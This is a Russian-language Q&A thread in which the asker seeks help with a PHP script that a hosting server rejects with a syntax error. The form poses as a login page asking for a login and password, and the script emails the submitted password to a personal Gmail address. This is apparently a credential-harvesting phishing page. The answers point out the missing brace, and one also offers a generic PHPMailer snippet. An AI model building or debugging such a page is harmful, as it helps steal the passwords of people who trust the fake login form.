# Как отправить данные на email используя php

Tags: php, html, html5, хостинг

Вот html:

```
<!DOCTYPE html >
<html>
    <head>
        <meta charset="utf-8" />
        <title>site</title>
    </head>
    <body>
        <form action="../php/send.php" method="post">
            <input type="text" name="fio" placeholder="Логин" required />
            <input type="password" name="email"  placeholder="Пароль" required />
            <input type="submit" value="Вход" />
        </form>
    </body>
</html>
```

Вот php, который я использу

```
<?php
if(!isset($_POST['fio']) and !isset($_POST['email'])){
 ?> <form action="send.php" method="post">
<input type="text" name="fio" required>
<input type="text" name="email" required>
<input type="submit" value="Отправить">
</form> <?php
} else {
$fio = $_POST['fio'];
$email = $_POST['email'];
$fio = htmlspecialchars($fio);
$email = htmlspecialchars($email);
$fio = urldecode($fio);
$email = urldecode($email);
$fio = trim($fio);
$email = trim($email);
//echo $fio;
//echo "<br>";
//echo $email;
if (mail("kk3394281@gmail.com", "mail", "Login:".$fio.". password: ".$email ,"From: example2@mail.ru \r\n"))
 {     echo "сообщение успешно отправлено";
} else {
    echo "при отправке сообщения возникли ошибки";
}?>
```

Я в php вообще ноль, при загрузке на хостинг, для проверки работоспособности я получил ошибку:

```
Parse error: syntax error, unexpected end of file in /storage/ssd5/329/14090329/public_html/php/send.php on line 25
```

Вот и прошу, помогите.

Answer (score 1, accepted):

Ошибка у тебя вероятно из-за того, что первый блок if/else у тебя не закрывается. В самом конце файла не хватает "}".

Comment: Оказалось так и есть, только не в конце, а в середине файла.

Answer (score 2):

я тоже не особо в php, но это работает:

```
require_once '/PHPMailer/PHPMailerAutoload.php';
 
$mail = new PHPMailer;
$mail->CharSet = 'UTF-8';
 
// Настройки SMTP
$mail->isSMTP();
$mail->SMTPAuth = true;
$mail->SMTPDebug = 0;
 
$mail->Host = 'ssl://smtp.gmail.com';
$mail->Port = 465;
$mail->Username = 'Логин';
$mail->Password = 'Пароль';
 
// От кого
$mail->setFrom('mail@snipp.ru', 'Snipp.ru');        
 
// Кому
$mail->addAddress('mail@site.com', 'Иван Петров');
 
// Тема письма
$mail->Subject = $subject;
 
// Тело письма
$body = '<p><strong>«Hello, world!» </strong></p>';
$mail->msgHTML($body);
 
// Приложение
$mail->addAttachment(__DIR__ . '/image.jpg');
 
$mail->send();
```

[PHPMailer](https://github.com/PHPMailer/PHPMailer)